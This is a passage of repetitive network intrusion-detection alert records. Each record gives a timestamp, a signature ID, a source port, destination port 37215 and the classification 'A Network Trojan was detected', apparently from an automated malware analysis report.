                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179541
                SID:2829579
                Source Port:53806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135842
                SID:2829579
                Source Port:46984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227573
                SID:2829579
                Source Port:35414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.227973
                SID:2829579
                Source Port:35400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135838
                SID:2829579
                Source Port:43444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708704
                SID:2829579
                Source Port:46042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042815
                SID:2835222
                Source Port:36868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022446
                SID:2829579
                Source Port:55536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560115
                SID:2829579
                Source Port:54866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520351
                SID:2829579
                Source Port:35154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613268
                SID:2829579
                Source Port:40436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287187
                SID:2829579
                Source Port:58342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660872
                SID:2829579
                Source Port:36228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000814
                SID:2829579
                Source Port:36960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713052
                SID:2829579
                Source Port:36924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292593
                SID:2835222
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899589
                SID:2829579
                Source Port:35586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781918
                SID:2829579
                Source Port:35362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531585
                SID:2829579
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782977
                SID:2835222
                Source Port:59766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284985
                SID:2835222
                Source Port:48908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890123
                SID:2829579
                Source Port:58810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113211
                SID:2829579
                Source Port:35120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876336
                SID:2829579
                Source Port:56102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.119377
                SID:2835222
                Source Port:37244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870456
                SID:2829579
                Source Port:32928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286743
                SID:2829579
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532832
                SID:2835222
                Source Port:58504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616035
                SID:2835222
                Source Port:60504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.452128
                SID:2829579
                Source Port:60198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.427610
                SID:2835222
                Source Port:52134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.692281
                SID:2829579
                Source Port:54930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519731
                SID:2829579
                Source Port:47888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586827
                SID:2829579
                Source Port:51106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141901
                SID:2829579
                Source Port:44530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.730619
                SID:2829579
                Source Port:54592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613291
                SID:2829579
                Source Port:55318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573278
                SID:2829579
                Source Port:36700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.267858
                SID:2835222
                Source Port:50116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438760
                SID:2835222
                Source Port:43140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611887
                SID:2835222
                Source Port:58216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944171
                SID:2835222
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883590
                SID:2835222
                Source Port:49896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993214
                SID:2829579
                Source Port:35282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901079
                SID:2835222
                Source Port:40976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520529
                SID:2829579
                Source Port:43382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338989
                SID:2829579
                Source Port:55396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437063
                SID:2829579
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.544491
                SID:2829579
                Source Port:32886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993090
                SID:2835222
                Source Port:46536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643280
                SID:2829579
                Source Port:43442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507060
                SID:2829579
                Source Port:55024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975209
                SID:2829579
                Source Port:56840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.583877
                SID:2835222
                Source Port:46162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.969851
                SID:2835222
                Source Port:51672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.856765
                SID:2829579
                Source Port:33836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767006
                SID:2829579
                Source Port:35404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500647
                SID:2835222
                Source Port:54822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155620
                SID:2835222
                Source Port:50360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728465
                SID:2829579
                Source Port:51772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.884091
                SID:2835222
                Source Port:36896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672626
                SID:2829579
                Source Port:44682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943298
                SID:2835222
                Source Port:53260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421987
                SID:2829579
                Source Port:36686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171117
                SID:2835222
                Source Port:41124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684983
                SID:2835222
                Source Port:53542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689160
                SID:2829579
                Source Port:54918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900530
                SID:2835222
                Source Port:58928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223829
                SID:2829579
                Source Port:34444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338679
                SID:2835222
                Source Port:36620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286759
                SID:2835222
                Source Port:46822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617431
                SID:2829579
                Source Port:34834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.450567
                SID:2829579
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.617438
                SID:2835222
                Source Port:43304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617654
                SID:2829579
                Source Port:48178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971754
                SID:2835222
                Source Port:36168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977656
                SID:2835222
                Source Port:33288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845853
                SID:2835222
                Source Port:54714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795923
                SID:2829579
                Source Port:45740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559354
                SID:2829579
                Source Port:58746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419674
                SID:2829579
                Source Port:48444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.984297
                SID:2829579
                Source Port:54084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662534
                SID:2829579
                Source Port:58756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612003
                SID:2829579
                Source Port:58256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652205
                SID:2835222
                Source Port:46476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335339
                SID:2829579
                Source Port:37052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614220
                SID:2835222
                Source Port:45882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.827232
                SID:2829579
                Source Port:52848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209353
                SID:2835222
                Source Port:46786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.864448
                SID:2835222
                Source Port:47960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.222116
                SID:2829579
                Source Port:35680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332514
                SID:2829579
                Source Port:35944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586666
                SID:2835222
                Source Port:40754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.643915
                SID:2829579
                Source Port:55270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900453
                SID:2829579
                Source Port:50694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.704646
                SID:2835222
                Source Port:43578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373969
                SID:2835222
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418302
                SID:2829579
                Source Port:42060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501773
                SID:2829579
                Source Port:45294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292662
                SID:2835222
                Source Port:52038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909259
                SID:2835222
                Source Port:59882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416466
                SID:2835222
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811591
                SID:2835222
                Source Port:58806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026740
                SID:2829579
                Source Port:45996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282414
                SID:2835222
                Source Port:34202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899155
                SID:2829579
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136765
                SID:2835222
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735353
                SID:2829579
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.810126
                SID:2829579
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499192
                SID:2835222
                Source Port:49466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650971
                SID:2835222
                Source Port:43204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721029
                SID:2829579
                Source Port:50520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902028
                SID:2829579
                Source Port:52508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962382
                SID:2829579
                Source Port:56866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731554
                SID:2829579
                Source Port:48536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702430
                SID:2829579
                Source Port:59142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967362
                SID:2835222
                Source Port:50494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574000
                SID:2835222
                Source Port:54920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.240662
                SID:2829579
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418838
                SID:2835222
                Source Port:42102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956276
                SID:2829579
                Source Port:55026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584186
                SID:2835222
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783695
                SID:2829579
                Source Port:60310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670432
                SID:2829579
                Source Port:53828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.863758
                SID:2835222
                Source Port:56858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731774
                SID:2835222
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465373
                SID:2829579
                Source Port:34280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618500
                SID:2835222
                Source Port:34938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816740
                SID:2829579
                Source Port:54720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416536
                SID:2829579
                Source Port:53222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007659
                SID:2829579
                Source Port:42462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281058
                SID:2829579
                Source Port:51316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782179
                SID:2829579
                Source Port:57176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959150
                SID:2835222
                Source Port:52948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.872736
                SID:2829579
                Source Port:35078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136026
                SID:2835222
                Source Port:40346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440622
                SID:2829579
                Source Port:32826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136977
                SID:2829579
                Source Port:35938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035318
                SID:2829579
                Source Port:54078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282255
                SID:2835222
                Source Port:58500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584110
                SID:2829579
                Source Port:54972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841319
                SID:2829579
                Source Port:53486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968248
                SID:2829579
                Source Port:56570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507385
                SID:2835222
                Source Port:39354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784877
                SID:2829579
                Source Port:50978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810786
                SID:2829579
                Source Port:52142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867733
                SID:2829579
                Source Port:43200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970303
                SID:2829579
                Source Port:36938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963158
                SID:2835222
                Source Port:45644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.533370
                SID:2829579
                Source Port:40668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931419
                SID:2835222
                Source Port:36608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514722
                SID:2829579
                Source Port:42596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009936
                SID:2835222
                Source Port:41726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942900
                SID:2835222
                Source Port:37322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263730
                SID:2829579
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165886
                SID:2835222
                Source Port:45818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.184652
                SID:2835222
                Source Port:39716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.561983
                SID:2835222
                Source Port:34162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042501
                SID:2829579
                Source Port:50874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.972098
                SID:2829579
                Source Port:38062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572901
                SID:2835222
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.239584
                SID:2835222
                Source Port:44728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073928
                SID:2829579
                Source Port:35844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113534
                SID:2835222
                Source Port:49768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.323035
                SID:2829579
                Source Port:44756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612009
                SID:2829579
                Source Port:36030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653173
                SID:2829579
                Source Port:59784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178892
                SID:2835222
                Source Port:45688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221025
                SID:2829579
                Source Port:58610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790747
                SID:2829579
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881875
                SID:2829579
                Source Port:60232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440285
                SID:2835222
                Source Port:38042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.063368
                SID:2829579
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883189
                SID:2835222
                Source Port:40300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717769
                SID:2835222
                Source Port:36756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002037
                SID:2829579
                Source Port:56604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651938
                SID:2829579
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925358
                SID:2835222
                Source Port:34894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626845
                SID:2829579
                Source Port:41780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930044
                SID:2835222
                Source Port:43082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727082
                SID:2829579
                Source Port:33348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328043
                SID:2829579
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654763
                SID:2835222
                Source Port:55856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947336
                SID:2835222
                Source Port:43384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.870127
                SID:2829579
                Source Port:56526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834645
                SID:2829579
                Source Port:40278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630634
                SID:2829579
                Source Port:46450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669730
                SID:2829579
                Source Port:46066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628269
                SID:2835222
                Source Port:56236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858818
                SID:2829579
                Source Port:48844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.693847
                SID:2829579
                Source Port:55938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744767
                SID:2835222
                Source Port:59586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273896
                SID:2829579
                Source Port:38892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397178
                SID:2829579
                Source Port:57130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359798
                SID:2835222
                Source Port:51304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716288
                SID:2835222
                Source Port:42902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940193
                SID:2829579
                Source Port:56612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
